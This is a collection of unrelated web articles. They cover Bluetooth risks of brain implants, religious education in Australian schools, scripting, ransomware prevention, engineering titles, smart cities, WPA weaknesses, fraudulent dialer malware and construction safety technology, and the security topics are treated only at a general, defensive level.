Aside from the fact that it is an implant versus a wearable, what makes this device so different is the intended function. While wearables often track physiology, this implant is designed to allow someone to control devices such as their computer or phone by simply thinking about it. The intent of this product’s development is to improve quality of life, specifically for those with paralysis such as quadriplegics.
Once implanted, neural activity is transmitted from the chip via Bluetooth to the BCI which will then translate the signal to an action for the end device. That action could be as simple as dialing the phone or as complex as controlling a robotic limb. Among the long-term goals for the program are restoring eyesight and full mobility.
These capabilities stem from noble intent, but just like with any other emerging technologies, the risks to privacy and security remain to be seen. Though a hacker would have to be much closer to gain control of a Bluetooth signal, it is possible. Depending on the type of Bluetooth hack, the results could include loss of connection between the implant and the BCI (Bluejacking), collection of personal data from the device (Bluesnarfing), or complete access similar to wiretapping a phone (Bluebugging).
As the Bluetooth signal in this case will be transmitting someone’s thoughts, there could be other concerns with regards to privacy and perhaps exploitation at the risk of disclosing embarrassing thoughts. Even more frightening would be a scenario in which thoughts or ideas can be transmitted into the brain which are then carried out as actions through the implant. Therefore, security protocols will need to be hardened and the user will have to be extra vigilant to limit potential intrusions, especially since there is currently not as much focus on Bluetooth security. | <urn:uuid:04dc5458-fbea-4b63-9a1f-2db44e30891d> | CC-MAIN-2024-38 | https://intelligenesisllc.com/neuralink-bluetooth-implants/ | 2024-09-12T06:51:47Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00528.warc.gz | en | 0.965235 | 565 | 3.015625 | 3 |
Rethinking religious education in public schools
There needs to be an overhaul of religious education programs in public schools, according to a Monash University expert.
Many government schools provide religious classes in the form of church-based ‘Religious Instruction’. These types of classes segregate students into faith-based groups in which they receive instruction in the beliefs and practices of one religion.
However, this form of religious education has become increasingly controversial, resulting in numerous government reviews, laws and policy changes. In particular, there is a concern that religious instruction of this manner can indoctrinate students by encouraging them to uncritically accept beliefs that are not well supported by evidence or beliefs that are controversial. This is particularly problematic in a ‘post-truth world’ that is flooded with disinformation, conspiracy thinking, science denialism and extremist thinking.
Religious instruction should be replaced by religion classes that foster social cohesion and intercultural understanding, according to Dr Jennifer Bleazby, Senior Lecturer in the School of Education Culture and Society at Monash University.
Bleazby also argues that educational efforts to combat ‘post-truth’ thinking can only be achieved with an alternative method to teaching religion.
“Education aims to foster reflective and critical thinking, intellectual virtues, an awareness of cognitive biases and the capacity for collaborative inquiry. It is counterproductive and hypocritical for schools to claim they actively discourage post-truth phenomena if they are simultaneously running religious instruction programs that aim to indoctrinate and risk encouraging the very types of thinking associated with the post-truth world,” she said.
In a recently published research paper, Bleazby calls for education leaders, policymakers and legislators to seriously re-evaluate the place of religious education in government schools.
“Not all approaches to religious education are problematic. Classes aimed at ‘General Religious Education’ or worldviews education can foster religious literacy, intercultural understanding and positive attitudes towards minorities, and also combat extremism. This approach to religious education can help to alleviate social divisions, social alienation and the extremism associated with post-truth problems.
“Since current state laws already permit this sort of religious education to be taught within the regular school curriculum, unlike Religious Instruction, it can readily be taught by qualified teachers employed in schools, not representatives of religious organisations,” Bleazby said.
As there are no federal laws that regulate religious education in government schools, each of Australia’s six states and two major territories have their own laws and policies, all of which distinguish between these two types of religious education. ‘General Religious Education’ has not been controversial in Australia and it can be expanded and incorporated into the official school curriculum.
Many parents also have concerns over the religious education their children are currently receiving in public schools.
A Queensland parent and spokesperson for lobby group Queensland Parents for Secular State Schools, Alison Courtice, is leading the charge in Queensland to have “teachers not preachers” guide religious education in state schools.
“In Queensland we are now in the 113th year of churches having legal right of entry to public school classrooms. It's time to close the school gates and say no to allowing our schools to be mission fields,” Courtice said.
Graham Macpherson, spokesperson for Fairness in Religions in School (FIRIS), fully supports these comments and proposals.
“Religious education, particularly in NSW Government schools, is problematic for the reasons Dr Bleazby gives. It also is increasingly becoming an administrative and logistical challenge for schools, with fewer and fewer students participating in Special Religious Education (SRE) or Special Education in Ethics (SEE) classes.
“The demand for SRE classes is merely supplier-led. It’s not due to student demand, nor is it student focused from an educational point of view. In 2023, religious instruction in government schools, such as SRE, is both ethically and philosophically wrong,” Macpherson said.
Bleazby concludes that given the growing problem and seriousness of post-truth phenomena, it is time to seriously re-evaluate the place of religious instruction in schools, which risks fostering the uncritical acceptance of beliefs and misinformation, and instead focus on developing and implementing religious education programs that foster social cohesion and intercultural inquiry.
Young children learn about the concept of pain through reading, a new study from University of...
Nearly 250 language backgrounds are represented in NSW public schools, according to a new report.
An analysis of student data has found that students struggling when they first start school are... | <urn:uuid:a09a2e1a-fde0-45d2-90c9-f60f68766977> | CC-MAIN-2024-38 | https://www.technologydecisions.com.au/content/futureed/news/rethinking-religious-education-in-public-schools-1018568018 | 2024-09-12T06:44:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00528.warc.gz | en | 0.958831 | 940 | 2.875 | 3 |
What Is a Script?
A script is a program written in a scripting language, such as JScript and VBScript. Alternative script languages include Rexx, Python, and Perl. When compared to programming languages such as C++ and Visual Basic, scripting languages are better suited to creating short applications that provide quick solutions to small problems.
In many cases, scripts are used to automate manual tasks, much like a macro. Scripts are well suited for:
Manipulating the Windows environment
Running other programs
Automating logon procedures
Sending key sequences to an application
For example, if you have several similar tasks, you can write one generalized script that can handle all of them.
You can write scripts that start an action in response to an event. You can write scripts that keep a running tally of events and trigger some action only when certain criteria are met.
Scripts are also useful for nonrepetitive tasks as well. If a task requires you to do many things in sequence, you can turn that sequence of tasks into just one task by scripting it. | <urn:uuid:82af3230-8669-4e90-9a42-cb1bbf728386> | CC-MAIN-2024-38 | https://admhelp.microfocus.com/uft/en/all/VBScript/Content/html/e83e4e42-aa1b-4cf6-99cc-6a7145405562.htm | 2024-09-13T12:27:01Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00428.warc.gz | en | 0.946474 | 221 | 3.609375 | 4 |
Ransomware prevention refers to the measures taken to protect computer systems and networks from ransomware attacks.
Ransomware is a type of malware that encrypts files on a victim's computer and demands payment in exchange for the decryption key. It is a growing threat to individuals, businesses, and organizations worldwide.
To prevent ransomware attacks, it is essential to have a multi-layered approach that includes both technical and non-technical measures. Technical measures include installing and regularly updating anti-virus and anti-malware software, using firewalls, and implementing intrusion detection and prevention systems. It is also crucial to keep all software and operating systems up to date with the latest security patches.
Non-technical measures include educating employees on how to recognize and avoid phishing emails and suspicious links, limiting access to sensitive data, and regularly backing up important files. Backing up data is particularly important as it allows organizations to restore their systems to a previous state in case of a ransomware attack.
In addition to these measures, it is also recommended to have a ransomware response plan in place. This plan should include steps to isolate infected systems, notify law enforcement, and communicate with stakeholders.
Overall, ransomware prevention requires a proactive and comprehensive approach that involves both technical and non-technical measures. By implementing these measures and staying vigilant, organizations can reduce the risk of falling victim to a ransomware attack. | <urn:uuid:a140f53b-e4df-4504-9591-060d43a628b1> | CC-MAIN-2024-38 | https://www.halcyon.ai/faqs/what-is-ransomware-prevention | 2024-09-13T10:51:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00428.warc.gz | en | 0.946904 | 281 | 3.5625 | 4 |
I enjoyed your article on the use of the term engineer in Canada (“Who are you calling an engineer?”, Feb. 22). Having worked in the IT industry years before becoming an engineer I can understand the confusion about the title of engineer. There are a lot of people in the IT industry who do not realize that they are not entitled to use that term. Many of these certification programs perpetuated this problem, as you have indicated, by referring to their graduates as ‘engineers’. As a result I was unaware of the legal restrictions on the use of the term ‘engineer’ when I set myself on the path to become an engineer. I was also not aware that the four years it takes to obtain an engineering degree are not enough to call yourself an engineer. Currently each university graduate requires four years of work experience with clear application of theory under the guidance of professional engineers before they are eligible to be licensed. That makes a total of eight years of training before one can obtain a license and use the term engineer.
It should be noted that (in Ontario,) the provincial government is the creator of these laws and the function of these laws is to protect the public. The associations are only tasked with the enforcing of these laws and regulating the activities of the members of the association. If an engineer does not take proper care when performing his or her duties their license can be suspended or revoked. The engineer is directly answerable for the results of his or her work. Therefore, when someone deals with an engineer they have a peace of mind knowing that the engineer is putting his or her livelihood on the line each time they seal a design.
In the U.S., this kind of restriction does not exist. The general attitude of the government there is buyer beware. Consequently, anyone who is drawing breath can call themselves engineers and as such the term ‘engineer’ just does not have the same meaning that it does in Canada. I personally have done a great deal of work in the U.S. since my graduation from university. It is very obvious the difference between an engineer that is licensed and everyone else calling themselves engineers. It can be very frustrating dealing with someone who does not understand and have the accountability that a licensed engineer has.
This is not, by any means, directed at the IT community. These laws have been in place for quite some time now and have established strong case precedence. This is merely part of the association’s job in protecting the public as spelled out in the laws for each of the provinces and territories in Canada.
Joseph J. Place, P.Eng.
Project Manager, Systems Engineering
APEGGA letter beyond belief
You really should try the dictionary before you go asking people with vested and not always entirely declared interests for definitions of common English words. Although your most recent article isn’t entirely leaning in the sole direction of supporting the APEGGA et al, it’s very much slanted in that direction and not a very good piece of balanced journalism.
“Engineer” is not a protected proper name, even when used in a job description, just because some association says so. A simple search on www.google.ca would have shown you over 190,000 results for the phrase “systems engineer”, and nearly double that for “software engineer”. Even the freely available dictionaries on the Internet should make this abundantly clear.
If APEGGA would like to protect a particular title as an official professional designation, such as “Professional Engineer(TM)”, then they may do so under the various acts and laws of the jurisdictions where they operate, but they do not have, and never will have, a monopoly on the common noun “engineer”. Our language evolves continually and we will continue to find new ways to use the word “engineer” – its application in the computing discipline is only one such way. Sending a stupid cease and desist letter to some innocent company attempting to hire someone to do some form of engineering is nearly beyond belief!
What target is next in APEGGA’s sights? Will they take on one of their more famous and widely published colleagues? Henry Petroski says that we are all engineers of one kind or another and that engineering is a fundamental endeavour of all humans.
Greg A. Woods
Senior Partner, Planix, Inc. | <urn:uuid:e49ba1d7-74c7-4334-bd15-a85246ba04b0> | CC-MAIN-2024-38 | https://www.itworldcanada.com/article/letters-to-the-editor-2/24426 | 2024-09-13T12:58:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00428.warc.gz | en | 0.97452 | 906 | 2.578125 | 3 |
Rampant urbanization is a serious threat as the number of people living in cities is likely to double by 2050. Many experts believe six billion people will live in cities by 2050, as compared to the 3.6 billion now and this increase is likely to put enormous pressure on the available resources. Clean water, power, waste management, living space and clean air will be some of the issues facing these future urbanites.
The problems that come with rampant urbanization are also unique opportunities to build cities that are smart and sustainable. Many countries have already embarked on this idea of building such smart cities and it is estimated that we will be spending a whopping $400 billion a year by 2020 to build them.
One of the driving forces behind these smart cities will be technologies such as Big Data and Internet of Things (IoT). In fact, Big Data opens up a world of opportunities for urban planners, government entities and private players to develop a range of applications that will make these future cities more livable.
Many applications are already being developed for smart cities such as smart street lights in Birmingham. This application will turn off street lights when there is no one around to conserve energy. Sensors attached to street lights will monitor footfall and noise levels and based on this data, the lights will turn themselves on or off.
In another pilot project in Seattle, 5,000 pieces of garbage were geo-tagged to monitor their movement to ensure that recycling is efficient. San Francisco, Vancouver and Bamberg in southern Germany have joined hands with a company called Autodesk to build 3D visualizations to monitor the performance of a city at any time.
Other cities such as Bristol, England are preparing for the future by installing an infrastructure network that will support the data generated through IoT and Big Data. All these examples are small steps that will eventually lead to the creation of smart cities that can sustain growing populations without hampering on the quality of life.
Perhaps, the best example of a futuristic city is Songdo in South Korea. This smart city is likely to become operational later this year and is built at a cost of $35 billion. Every inch of this city is wired and even children have bracelets with sensors to track them when they get lost. Climate, energy consumption, traffic congestion and just about everything else will be monitored by sensors and driven by policies based on this data.
To make sense of such vast amounts of data, Big Data technologies are the key. This is why many companies such as IBM are creating Big Data projects aimed to drive these futuristic societies.
With these initiatives, the future is sure going to be interesting! | <urn:uuid:7f80199a-deae-471c-9d72-8eba615bd7b8> | CC-MAIN-2024-38 | https://icrunchdata.com/blog/464/using-big-data-to-build-smart-cities/ | 2024-09-16T00:31:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00228.warc.gz | en | 0.962891 | 534 | 3.453125 | 3 |
Read Part 2 of this article.
Since the turn of the century, wireless networking has grown from a very exclusive tech toy into a full-blown phenomenon. For less than $50, anyone who can plug in a toaster can essentially set up a wireless local area network (WLAN). The problem with this plug-and-play generation of users is that very few understand how their data is sent through the air, much less comprehend the associated risks. Even as I write this, an estimated 40–50% of all wireless users are not implementing any form of protection. On the bright side, this percentage is falling, albeit very slowly.
The security problem is exacerbated by the fact that early attempts at encryption were flawed. Wired Equivalent Privacy (WEP) was found to be vulnerable to various statistical weaknesses in the encryption algorithm it employed to scramble data passed over the WLAN. While attempts were made to correct the problem, it's still a relatively simple feat to crack WEP and essentially pull the password right out of the air. In addition, WEP suffers from other problems that make it unacceptable for use in any secure environment.
The wireless community knew early on that these problems existed. However, they also realized that it would take years until the standardized correction was designed and implemented into new hardware. In the meantime, millions of users needed reliable protection. The Wi-Fi Alliance stepped up to the challenge and created an interim "standard" called Wi-Fi Protected Access (WPA).
WPA did an excellent job of patching the problems in WEP. With only a software upgrade, it corrected almost every security problem either created or ignored by WEP. However, WPA also created new problems:
- One flaw allowed an attacker to cause a denial-of-service attack, if the attacker could bypass several other layers of protection.
- A second flaw exists in the method with which WPA initializes its encryption scheme. Consequently, it's actually easier to crack WPA than it is to crack WEP. This flaw is the subject of this article. | <urn:uuid:d2157f16-2666-4854-a0a7-be1fb02f7b14> | CC-MAIN-2024-38 | https://www.ciscopress.com/articles/article.asp?p=369221 | 2024-09-15T22:55:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00228.warc.gz | en | 0.969165 | 422 | 3.1875 | 3 |
Hydrogen Application in Chemicals Industry
The hydrogen application in chemicals industry is growing in popularity, with an emphasis on utilizing its adaptability as a feedstock for a range of chemical processes to support the sector's sustainability efforts.
Hydrogen serves as a clean and effective substitute in processes like hydrogenation, ammonia production, and methanol synthesis, making its hydrogen application in chemicals industry essential for lowering carbon emissions.
Investigating hydrogen application in the chemicals sector offers game-changing possibilities, from improving manufacturing efficiency to facilitating the creation of green chemicals, all of which are in line with the larger objectives of creating a low-carbon and ecologically conscious sector.
Hydrogen plays a key role in the chemical industry as a raw material and an important energy source in many chemical processes. The use of hydrogen in the chemical industry offers numerous benefits, including improved efficiency, increased productivity and reduced environmental impact.
Here are some key applications of hydrogen in the chemicals industry:
"Green hydrogen," created by electrolysis using renewable energy sources, is gaining popularity as the industry focuses more on sustainability and cutting carbon emissions. As a cleaner hydrogen substitute made from fossil fuels, green hydrogen has the potential to become even more important in the chemical industry.
- Hydrogenation: One of the fundamental uses of hydrogen in the chemical industry is the hydrogenation process, in which hydrogen is added to unsaturated organic compounds. Hydrogenation produces a number of chemicals, including vegetable oils, margarine, and petroleum products. This process improves the quality of these products and reduces their environmental impact by reducing their carbon content.
- Ammonia Production: Ammonia is an important chemical raw material for the production of fertilizers, explosives and other chemicals. The Haber-Bosch process is the most common method of producing ammonia and requires large amounts of hydrogen. As demand for fertilizers and other ammonia-based products increases, demand for hydrogen in the chemical industry is also expected to increase.
- Methanol Production: Methanol is a multipurpose chemical that finds use in the manufacturing of plastics, solvents, and fuel. Although it can also be made using renewable energy sources from carbon dioxide and hydrogen, methanol is normally produced from coal or natural gas. The production of methanol from renewable hydrogen has a large positive impact on the environment and can lessen the chemicals industry's carbon footprint.
- Olefin Production: Olefins are a class of compounds that are used to make a variety of goods, such as fibers, rubber, and plastics. Large amounts of hydrogen are produced when hydrocarbons are cracked in order to produce olefins. Hydrogen provides substantial energy savings and environmental advantages in the olefins production process.
- Refining: Hydrogen is also used in the refining of petroleum products to remove impurities and improve the quality of the final products. The use of hydrogen in refining processes can also help reduce emissions and improve energy efficiency.
- Hydrogenation Reactions: In the synthesis of many different chemicals, hydrogenation reactions are frequent. Hydrogen gas can be used to hydrogenate unsaturated compounds when a catalyst is present. Edible oils and fats are produced using this process, for instance.
- Hydrogen Peroxide Production: Hydrogen peroxide is made with the use of hydrogen. An important chemical with a variety of uses, including as a bleaching agent, hydrogen peroxide is created when hydrogen reacts with anthraquinone in the anthraquinone process.
- Hydrogen in the Production of Synthetic Fuels: By converting hydrogen and carbon monoxide into hydrocarbons during procedures like Fischer-Tropsch synthesis, hydrogen can play a significant role in the creation of synthetic fuels.
Frequently Asked Questions (FAQ):
How is hydrogen used in the chemical industry?
Hydrogen is extensively used in the chemical industry as a key ingredient for various processes, including hydrogenation reactions to produce saturated fats, ammonia synthesis for fertilizer production, methanol synthesis as a precursor for chemicals and fuels, and as a reducing agent in numerous chemical reactions for the production of various compounds.
How is hydrogen gas valuable for the chemical industry?
Hydrogen gas is valuable for the chemical industry due to its versatility as a feedstock, reducing agent, and energy carrier. It enables the production of a wide range of chemicals, facilitates efficient reactions and transformations, and serves as a clean and sustainable option when produced from renewable sources, contributing to the decarbonization of the industry.
What chemicals are required for hydrogen production?
The chemicals required for hydrogen production depend on the method used. Commonly used chemicals include natural gas (methane) for steam methane reforming, water for electrolysis, and hydrocarbon feedstocks for processes like partial oxidation or coal gasification. The specific chemicals used vary based on the chosen hydrogen production technology.
What are the barriers to the hydrogen industry?
Barriers to the hydrogen industry include high production costs, limited infrastructure for storage and distribution, technological challenges in efficient hydrogen production and utilization, and the need for supportive policies and regulations to promote widespread adoption and investment in hydrogen technologies. Additionally, public acceptance and safety concerns are also important considerations for the industry's growth. | <urn:uuid:977ea7fc-0833-41cf-ac15-7ffc24d6e6c0> | CC-MAIN-2024-38 | https://www.marketsandmarkets.com/industry-practice/hydrogen/chemicals-industry | 2024-09-15T23:51:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00228.warc.gz | en | 0.941249 | 1,060 | 3.28125 | 3 |
Cyber security should be an ever-present concern for businesses of any size. Large organisations can afford to dedicate considerable resources to protecting their enterprise but smaller businesses often have to take a more cost-effective approach. Fortunately, there are several ways to substantially improve your cyber security. These five tips will allow you to minimize your susceptibility to digital threats through the application of simple and easy techniques.
For the protection of your most valuable data, use two-factor authentication to add an additional layer of security. Two-factor authentication means that the user has to pass an extra security check before they can access the content. This reduces the possibility of nefarious entities gaining access to your data even if they enter the correct password.
Many companies require users to enter a personalized code to access private information. The code is often sent via text or email to a previously verified address. The user enters their normal login details and then the code to complete the two-factor authentication.
Poor password practice is the number one cause of serious security breaches. Take your password management seriously. Inform every member of your staff to create a password that is unique to them by combining more than one word and intentionally misspelling it with numbers in place of some letters. Capitalize letters at random to further reduce the chance of the password being guessed.
Change your passwords at regular intervals. It is easy to become complacent and keep the same password for months at a time but doing so will leave you more vulnerable to cyber threats. If you’re concerned about not remembering your new passwords, there are several reputable password management applications available that will simplify the entire process.
- Back ups
Back up your data regularly. Cyber threats can manifest themselves via theft or corruption and you could lose valuable files if you don’t back up your data. All back ups should be made to a source that is completely detached, physically and digitally, from your primary data storage device. If you back up your files onto a device in the same system, it could be subject to the same damage or threats that you’re trying to protect it from.
Create a regular back up schedule and automate the process if necessary. Encrypt the information and ensure it is fully password protected at all times. Don’t back up your files to a third party you don’t trust implicitly.
The digital landscape is mercurial and unpredictable. The threats you face will change from one day to the next so it’s important to constantly update your protections. Check your anti-virus software regularly for updates and install any recommended changes as soon as possible. If there is an option to automatically update your anti-virus software, ensure it is turned on if you trust the developers.
Similarly, you should keep all of your other software updated. Most updates are instigated by the developers in response to newly discovered threats so it’s important to be aware of any update prompts or notices.
The best deterrent to cyber threats is to ensure everyone in your operation is aware of the recommended security practices. Take the time to educate anyone who has access to your data on the most effective techniques regarding cyber security. Stay up to date and aware of any possible threats and pass the information on to all relevant parties as soon as possible. Only through constant research and keeping your finger on the pulse will you be able to protect your business consistently.
Cyber security is a serious consideration that should be a priority for all businesses. Organisations of any size can become victims of digital crime so it’s important to be proactive in your defence. Take the time to develop a culture of tight security and positive practices and you’ll substantially improve your chances of successfully repelling an attack. | <urn:uuid:62df5b7a-ec22-41f1-9d4f-500bd75da093> | CC-MAIN-2024-38 | https://cpcyber.com/five-ways-to-improve-your-businesss-cyber-security/ | 2024-09-17T06:33:14Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651739.72/warc/CC-MAIN-20240917040428-20240917070428-00128.warc.gz | en | 0.933682 | 754 | 2.65625 | 3 |
Now that we've all got our heads wrapped around the idea that Artificial Intelligence (AI) is now a reality and is helping us be more productive (rather than taking over the world), in comes quantum computing.
Quantum computing is based on the principles of quantum mechanics, which examines the properties and behaviors of the smallest particles that make up everything around us. When applied to computing, this means utilizing aspects of computer science, physics, and mathematics to solve complex problems faster than on classical computers. To date, no machine has achieved this feat, but experts agree that quantum computing will become a reality for the workforce within the next five years. Continue reading | <urn:uuid:89984a7b-92c8-4c79-8105-198b0d9825dc> | CC-MAIN-2024-38 | https://www.govevents.com/blog/tag/quantum-mechanics/ | 2024-09-17T06:08:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651739.72/warc/CC-MAIN-20240917040428-20240917070428-00128.warc.gz | en | 0.94548 | 130 | 3.296875 | 3 |
A dialer (fraudulent version) is a program that uses computer’s modem to establish a dialup connection over the Internet and make the money from calls. A connection is made by dialing a predetermined phone number and connecting to an international or premium rate local phone numbers. Dialers are capable of making an unauthorized connection and bypassing the local Internet service provider. After performing these activities, victims lose the money by receiving increased phone bills.
The most of dialers are malicious programs that work in the same manner as regular computer viruses. Therefore, they change system’s essential dialup and networking settings without user’s consent and approval. A typical dialer runs on every computer startup and attempts to hide its presence on the system. A parasite doesn’t affect computer’s performance and doesn’t leave any clues like unexpected advertisements or third-party toolbars, so its activity can hardly be easily noticed. Users of broadband lines, such as DSL, LAN or similar, cannot be affected because their computers have no modems installed.
Some dialers are legitimate applications developed by Internet service providers and certain companies. Their task is to ease the process of setting up an Internet connection or to perform marketing campaigns of third parties. Such parties provide their users with the license agreement and inform them about the installation of a dialer. Nevertheless, such programs are quite rare.
Activities that characterize dialers
- Using a compromised computer to connect to the high-cost phone numbers.
- Promoting potentially unsafe web sites with pornographic, advertising or other similar content.
- Causing system modification and altering essential dialup and networking settings. This is done by the dialer for registering itself as a default Internet connection service and connecting a compromised computer over the Internet.
- Changing web browser’s settings. You can notice changes in your home page and default search engine. In addition, you can be prevented from restoring these settings.
- Creating numerous links that could lead people to potentially insecure web sites. In addition, a victim may also notice unknown desktop shortcuts to suspicious sites, unknown bookmarks and new entries in his/hers Favorites list.
- Provides no removal feature.
Infiltration techniques that are used by dialiers
Although the most dialers are very similar to regular viruses, their distribution methods are quite different. They do not spread like other types of malware. In most of the cases, people have to install them on the system as any other software. This can be done either with or without user’s content. More information about the major distributors that have been used for the unnoticed installation of dialer parasites is provided below.
- Pornographic and illegal websites. Sites that are filled with adult-oriented content, illegal music and video files and similar offers should be avoided. Otherwise, they can trick the user to download and manually install a particular dialer on the system. No matter that it is declared that this should be done for getting an ability to receive an access to desired constant, you should not agree with such installation. Such dialers not only fail to provide the uninstaller, but can also lead you to the loss of your money by making Internet connections through high-cost phone numbers.
- System vulnerabilities. The biggest amount of malicious dialers get into the system by exploiting certain vulnerabilities. Such security holes may appear by failing to update anti-virus/anti-spyware software or web browser. In addition, the malicious dialer may appear on your computer by running into an insecure web site that is filled with the malicious code or by clicking on an unsafe pop-up ad. The affected user cannot notice anything suspicious, as parasites do not display any setup wizards, dialogs or warnings.
- Spam and malicious email messages. Some dialers are secretly installed on the system by opening spam or malicious e-mail messages. Some part of such parasites arrives to the target PC system as legitimate e-mail attachments. Their installation is made without user’s consent and approval.
The most popular examples of dialers
There are lots of different dialers that are considered malicious. The following examples illustrate their behavior on the affected PC system.
661-748-0240 offers access to the Internet via high-cost telephone numbers. It redirects a web browser to certain Internet resources and changes default home page without asking for user permission. This dialer can be secretly installed while visiting some unsafe web sites. The parasite alters the registry, so the threat runs on every Windows startup, and creates a desktop shortcut named Click Me!!!. Most dialers are quite similar to this example and do not pose any threat to the system, but severely violate the privacy of the user.
Trojan.Dialer.yz connects its victim’s computer to the Internet through expensive phone number. It is capable of accessing a predefined Internet resource on required domain without asking a permission from the user. This threat silently erases the web browser’s cache and history. The parasite gets into the system from some insecure web sites. The dialer complicates its detection and removal and doesn’t have the functional uninstaller.
Trafficadvance is a way more harmful dialer that not only connects a compromised computer to the Internet using a premium rate phone number, but also terminates some running applications and steals system information. Once executed, it modifies the Windows registry to register itself as a primary Internet connection service. This means that all further Internet connections will be made through expensive phone number instead of local lnternet service provider’s default one. Such activity results in receiving enormous phone bills.
Removing dialer from the PC system
As it was said above, the most of dialers work in the same manner as the computer viruses and, therefore, can be found and removed with the help of reliable anti-spyware program. We can recommend FortectIntego or SpyHunter 5Combo Cleaner that have showed great results when removing dialer from the system.
Beware that in some cases even the most antivirus or spyware remover can fail to get rid of a particular dialer. That is why there are Internet resources such as 2-Spyware.com, which provide manual malware removal instructions. These instructions allow the user to manually delete all the files, directories, registry entries and other objects that belong to a parasite. However, manual removal requires fair system knowledge and therefore can be a quite difficult and tedious task for novices.
Latest dialers added to the database
Information updated: 2017-05-11 | <urn:uuid:51f70e4e-1379-4a6d-8519-c047b82ad4ef> | CC-MAIN-2024-38 | https://www.2-spyware.com/dialers-removal | 2024-09-20T21:36:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00728.warc.gz | en | 0.921041 | 1,347 | 2.546875 | 3 |
Although traditionally viewed as one of the least-digitized industry sectors, construction has recently benefited from new technological innovations that have improved many aspects of the industry. These improvements range from enhancing the efficiency of project management to upgrading payroll, accounts receivable, and lien filing processes. Perhaps one of the biggest and most important uses of technology in construction is improving workplace safety.
The construction sector is one of the most dangerous industries to work in, with the sector accounting for 47% of total worker deaths in the United States in 2017.
As the United States construction industry becomes larger and more technologically advanced, many industry leaders have identified implementing improved safety protocols as their top concern. The construction sector is one of the most dangerous industries to work in, with the sector accounting for 47% of total worker deaths in the United States in 2017. The Occupational Safety and Health Administration reports that 5,147 United States construction workers died while working in 2017, averaging around 14 deaths per day.
The Occupational Safety and Health Administration reports that 5,147 United States construction workers died while working in 2017, averaging around 14 deaths per day.
The biggest risks that construction workers face on a construction site- collectively known as the “Fatal Four”- include falling, being struck by an object, being electrocuted, and getting caught in between hazards. Experts estimate that eliminating the Fatal Four will save 582 workers’ lives in the United States every year. New construction technology can make that possible.
Technological innovations in workplace safety have advanced far beyond simple hard hats and safety glasses. From drones used in site inspections to exoskeletons that reduce the risk of injury, construction technology is making construction work safer. Here are some of the ways technology helps with workplace safety in construction.
1. Using drones for site surveys
Modern construction sites are larger in scope and complexity than ever before (and continue to grow), which makes it difficult to manage an entire site effectively. Site inspection can take days to finish. In addition, every site contains safety hazards that can pose a danger to site inspectors.
What if we can eliminate the need for site inspectors to put themselves in danger? Thanks to unmanned aerial vehicles, popularly known as drones, this is now possible. Developed initially for military use, drones have evolved to the more consumer-friendly role of providing unique photographic and video perspectives. As a result of this evolution, drones are now critical to improving construction site safety.
When equipped with infrared cameras and laser-based range finders, drones can conduct site surveys, look for safety hazards, and monitor construction workers, all while their human operators observe remotely from a safe location.
2. Using exoskeletons to reduce the risk of injury
Due to the nature of the job, construction workers face a high risk of straining their bodies or acquiring musculoskeletal disorders. These injuries are caused by lifting heavy objects, using heavy work tools, and using the wrong tools to do the job; thanks to new technology, construction workers can perform their tasks more safely.
To limit the strain on construction workers’ bodies, project managers can assign exoskeletons, also known as exosuits, to employees. The exoskeletons are another piece of technology developed by the military that is now seeing applications in the construction industry. These suits are metal frameworks that can be equipped with mechanical systems that can multiply the wearer’s strength and improve their posture.
Two types of exoskeletons are available—power-assisted and unpowered.
Unpowered exosuits do not use motors or actuators but rather use a mechanical harness wrapped around a wearer’s body. Depending on the design, unpowered exosuits may be wrapped around the arms, shoulders, chest, waist, and thighs. The most common mechanism uses erector sets usually made with a strong material such as carbon fiber that acts as a counterweight and distributes the weight of an object carried by the wearer away from the lumbosacral region to the pelvis or even the floor for stability.
On the other hand, power-assisted exosuits are equipped with a network of motors and sensors that multiply the wearer’s strength. These can be powered by electric motors, pneumatic air muscles, or hydraulics that are designed to sense the wearer’s movement and signal the motors to augment the motion.
3. Using virtual reality technology in realistic safety training
Nothing beats safety training in eliminating fatalities and injuries in the construction industry. Many of the common safety hazards found at a construction site can be avoided if employees know how to handle them. However, safety memos and seminars can only do so much. Traditional lectures or video presentations may not be engaging enough for employees (especially younger ones) to retain the information that needs to be kept in mind while doing work on-site.
Virtual reality (VR) technology removes the limitations of the traditional training process and provides an immersive way for employees to learn about the safety hazards present in construction work. VR technology can simulate a realistic sensation of height, stress, and other psychological hazards that cannot be replicated in traditional safety training.
For instance, VR can simulate a worker entering a lift and show that they are being transported up where they need to fulfill certain tasks. Monitoring the worker’s heart rate and stress levels gives trainers insight into the worker’s experience, which they can use to help workers manage stress. Trainers can even create VR scenarios that are tailored to a specific construction site.
VR technology may seem too futuristic or distracting for construction firms to handle, but with the help of a unified endpoint management solution (UEM) like 42Gears SureMDM, you can ensure that VR headsets run only pre-approved applications.
Project owners and managers share one goal: to eliminate workplace fatalities and injuries in the construction industry. With innovations like drones, exosuits, and virtual reality, the industry is getting closer to reaching this goal.
About the Author:
Patrick Hogan is the CEO of Handle.com. | <urn:uuid:37cf1c17-8656-49de-bac5-9b1e84367b58> | CC-MAIN-2024-38 | https://www.42gears.com/blog/3-technological-solutions-to-construction-safety-issues/ | 2024-09-20T21:40:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00728.warc.gz | en | 0.945361 | 1,241 | 2.90625 | 3 |
